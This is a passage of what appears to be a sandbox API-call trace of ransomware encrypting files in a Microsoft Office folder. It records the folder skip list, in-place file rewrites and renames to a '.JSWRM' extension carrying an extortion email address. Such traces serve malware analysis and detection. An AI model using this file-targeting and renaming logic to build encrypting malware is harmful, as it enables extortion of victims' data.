lpString2="$RECYCLE.BIN") returned 1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="system volume information") returned -1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="msocache") returned -1 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGREPFRM.XML", lpUsedDefaultChar=0x0) returned 12 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGREPFRM.XML", lpUsedDefaultChar=0x0) returned 12 [0141.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.158] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1884) returned 1 [0141.158] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.158] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x750, lpOverlapped=0x0) returned 1 [0141.160] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.160] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x750, lpOverlapped=0x0) returned 1 [0141.160] CloseHandle (hObject=0x238) returned 1 [0141.160] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.161] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae41, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGSIDEBR.DPV", cAlternateFileName="")) returned 1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2=".") returned 1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="..") returned 1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="...") returned 1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="windows") returned -1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="recovery") returned -1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="perflogs") returned -1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="documents and settings") returned -1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="system volume information") returned -1 [0141.161] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="msocache") returned -1 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.163] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44609) returned 1 [0141.163] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.163] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xae40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xae40, lpOverlapped=0x0) returned 1 [0141.167] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.167] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xae40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xae40, lpOverlapped=0x0) returned 1 [0141.169] CloseHandle (hObject=0x238) returned 1 [0141.169] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.170] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x20ce, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGSIDEBR.XML", cAlternateFileName="")) returned 1 [0141.170] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2=".") returned 1 [0141.170] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="..") returned 1 [0141.170] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="...") returned 1 [0141.170] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="windows") returned -1 [0141.170] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="recovery") returned -1 [0141.171] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="perflogs") returned -1 [0141.171] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="documents and settings") returned -1 [0141.171] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.171] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="system volume information") returned -1 [0141.171] lstrcmpiW (lpString1="DGSIDEBR.XML", lpString2="msocache") returned -1 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.172] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8398) returned 1 [0141.172] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.172] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x20c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x20c0, lpOverlapped=0x0) returned 1 [0141.174] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.174] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x20c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x20c0, lpOverlapped=0x0) returned 1 [0141.174] CloseHandle (hObject=0x238) returned 1 [0141.174] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.175] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc74eab3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc74eab3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGSIDEBRV.XML", cAlternateFileName="DGSIDE~1.XML")) returned 1 [0141.175] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2=".") returned 1 [0141.175] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="..") returned 1 [0141.175] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="...") returned 1 [0141.175] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="windows") returned -1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="recovery") returned -1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="perflogs") returned -1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="documents and settings") returned -1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="system volume information") returned -1 [0141.176] lstrcmpiW (lpString1="DGSIDEBRV.XML", lpString2="msocache") returned -1 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBRV.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBRV.XML", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBRV.XML", lpUsedDefaultChar=0x0) returned 13 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBRV.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSIDEBRV.XML", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSIDEBRV.XML", lpUsedDefaultChar=0x0) returned 13 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBRV.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.177] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3558) returned 1 [0141.177] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.177] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0141.179] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.179] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0141.179] CloseHandle (hObject=0x238) returned 1 [0141.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBRV.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebrv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSIDEBRV.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgsidebrv.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.180] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc74eab3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc74eab3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb84, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGSTORY.XML", cAlternateFileName="")) returned 1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2=".") returned 1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="..") returned 1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="...") returned 1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="windows") returned -1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="recovery") returned -1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="perflogs") returned -1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="documents and settings") returned -1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="system volume information") returned -1 [0141.180] lstrcmpiW (lpString1="DGSTORY.XML", lpString2="msocache") returned -1 [0141.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORY.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORY.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSTORY.XML", lpUsedDefaultChar=0x0) returned 11 [0141.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORY.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORY.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSTORY.XML", lpUsedDefaultChar=0x0) returned 11 [0141.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORY.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstory.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.182] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2948) returned 1 [0141.182] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.182] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb80, lpOverlapped=0x0) returned 1 [0141.183] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.183] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb80, lpOverlapped=0x0) returned 1 [0141.184] CloseHandle (hObject=0x238) returned 1 [0141.184] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORY.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstory.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORY.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstory.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.185] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb84, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGSTORYVERT.XML", cAlternateFileName="DGSTOR~1.XML")) returned 1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2=".") returned 1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="..") returned 1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="...") returned 1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="windows") returned -1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="recovery") returned -1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="perflogs") returned -1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="documents and settings") returned -1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="system volume information") returned -1 [0141.185] lstrcmpiW (lpString1="DGSTORYVERT.XML", lpString2="msocache") returned -1 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORYVERT.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORYVERT.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSTORYVERT.XML", lpUsedDefaultChar=0x0) returned 15 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORYVERT.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGSTORYVERT.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGSTORYVERT.XML", lpUsedDefaultChar=0x0) returned 15 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 